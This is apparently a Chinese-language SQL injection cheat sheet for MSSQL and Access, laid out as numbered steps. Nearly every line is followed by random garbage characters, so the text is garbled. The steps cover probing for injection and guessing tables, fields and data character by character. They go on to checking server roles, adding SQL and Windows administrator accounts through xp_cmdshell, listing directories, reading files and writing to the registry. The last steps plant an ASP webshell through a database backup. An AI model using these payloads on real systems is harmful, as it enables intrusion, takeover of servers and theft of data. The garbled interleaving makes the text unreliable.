1.判断是否有注入;and 1=1 ;and 1=2 7GZq|M_�:y
2.初步判断是否是mssql ;and user>0 �^M|K;j�t>
�J_�xG}d��
3.注入参数是字符'and [查询条件] and ''=' T:!MBWYe�|
X~RH�^V�Yv
4.搜索时没过滤参数的'and [查询条件] and '%25'=' z\.1>/Z�=�
nyhMnp#��<
5.判断数据库系统 �z �$6JpG�
C6���@t���
;and (select count(*) from sysobjects)>0 mssql 'IQ�sve7cI
xb$yu�.c��
;and (select count(*) from msysobjects)>0 access yFM>�T\@��
i�_U}{|j��
k�h?�. K#�
9��P"i�uU�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 2)�\vj5<~$
fp&Got!pB�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 h~miP7,c<u
�$TG�?���4
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 .JAcPy�K^�
F2�>%K��uM
9.(1)猜字段的ascii值(access) ���"mZ�.V
�?R6`qe_�F
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 0BTLcE�qgZ
�<_:zI �r,
(2)猜字段的ascii值(mssql) �(pYYkR"�
��9]$`)�wZ
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �Y}.Yst�em
�/iC�_!n�u
10.测试权限结构(mssql) WE.�Tuo5�L
[7\>�"v�6
�e4.&a�IC[
6
=�gp��:I
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
Hg(5S,O�2
�y�\[�r(4h
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- JO1
,�T�tA
|:2c�$z��q
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- m�m,�lhI�h
�ULl_\5s�2
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �y1C/v�:;
�lbkL�y�p2
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- #T%�zfcU�j
_413\`%8?
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- x�zk�}[3P{
�z=�"�L��4
;and 1=(select IS_MEMBER('db_owner'));-- Y��@}�FL;3
D4Sh9���:\
u��va\�0q�
E`)Qs[?�Gk
11.添加mssql和系统的帐户 �dl���D}Ub
:p�-Y7CSSu
;exec master.dbo.sp_addlogin username;-- iJ�P{|�-�h
;exec master.dbo.sp_password null,username,password;-- 6k9�Lx�C:M
UqtHxEI%R~
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �/`+�7�_=-
�*K)0�UKBr
;exec master.dbo.xp_cmdshell 'net user username password 4e9E'�
"8%
8:{�q8xZ=k
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- tWk�{��1IL
�zM59UQ�U;
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ab�W�l u�t
Sd�c*rpH"(
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- (I=6N��nt'
`-O=�>U5nH
�2R�`u[���
?�,% TU&Yn
12.(1)遍历目录 �0�Q1/�n2V
4}-#�mBV]/
;create table dirs(paths varchar(100), id int) wj%wp[K�A$
j�=j��+Nf$
;insert dirs exec master.dbo.xp_dirtree 'c:\' 9��#@Zz4Ww
�IVteF*8hU
;and (select top 1 paths from dirs)>0 !Z�s,-=�^D
29�5w.X(J�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) rJ(�OAKnY�
�-,GEv�%6c
�E1W:��hGI
���c{>|�o�
(2)遍历目录 A,�c'�g}�:
\_� -DyD#3
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- p@t�p�]u`7
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 re� uYT�H�
D[��~}uZ4\
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ;$�;rD0i|�
@�HEPc9�5�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 .B$h2#i1��
a:�u}d7T3e
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ]u=�Ca#!�'
h7�?.2Q&S�
H8i+'5x�,?
AZ�wa4n�}"
13.mssql中的存储过程 �Z��Q[~*�)
Wc;+2Hl[�@
xp_regenumvalues 注册表根键, 子键 F�=�i!d�,S
NI\H
\#bJ�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �`�Zf9$K|�
&@�; RI�~�
xp_regread 根键,子键,键值名 B��XA]9eK
_?b;0{93u�
;exec xp_regread �$4�Y&j}�R
Ab
�g$W/(|
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 W5/};�K\�.
evOb������
xp_regwrite 根键,子键, 值名, 值类型, 值 7�@P656{�
�RpN� �<�=
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ���Qa?aL�
��u����F<S
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 k�7T
a��lR
;*QN9�T=�0
xp_regdeletevalue 根键,子键,值名 k1i��Lnza%
('d{t:Ts�Y
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 b4�2QBTeg�
XRa#2�1�pQ
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 T} 8CfG_�j
<g�cmsiB�|
�o)!�m$Q~v
#=x+
[�d+�
14.mssql的backup创建webshell & rQD�`E/�
|�EeBSRAfe
use model o7��arxo\�
@d�V�9Dp�u
create table cmd(str image); s�VoR?peQ�
:�;��T�YL[
insert into cmd(str) values (''); �]xr���D<�
" �$=qGHA~
backup database model to disk='c:\l.asp'; (�}0S1)7t�
cY~M4:�vgT
4\1;A`�2%0
�M.[wKG�X(
15.mssql内置函数 K;C_��Z/<%
�VN�+\>j�-
;and (select @@version)>0 获得Windows的版本号 w�,
7C�r�
{]["6V�6W�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa *(n�JX.7��
5H!%0LrJg=
;and (select user_name())>0 爆当前系统的连接用户 �WRM$DA���
\n(�R�Of^'
;and (select db_name())>0 得到当前连接的数据库 ai�^t�=�
s
B^�m!�t7/,
�M[��z3� f
xgs@gw7!n0
16.简洁的webshell Y�kI9d&ib+
DZ��P*x���
use model 1��RA }a�X
<W��f0QO,�
create table cmd(str image); )JX$/-
RD-
hr1�$1&p��
insert into cmd(str) values (''); R8uj3�!3�^
`WlH�*p)z9
backup database model to disk='g:\wwwtest\l.asp';
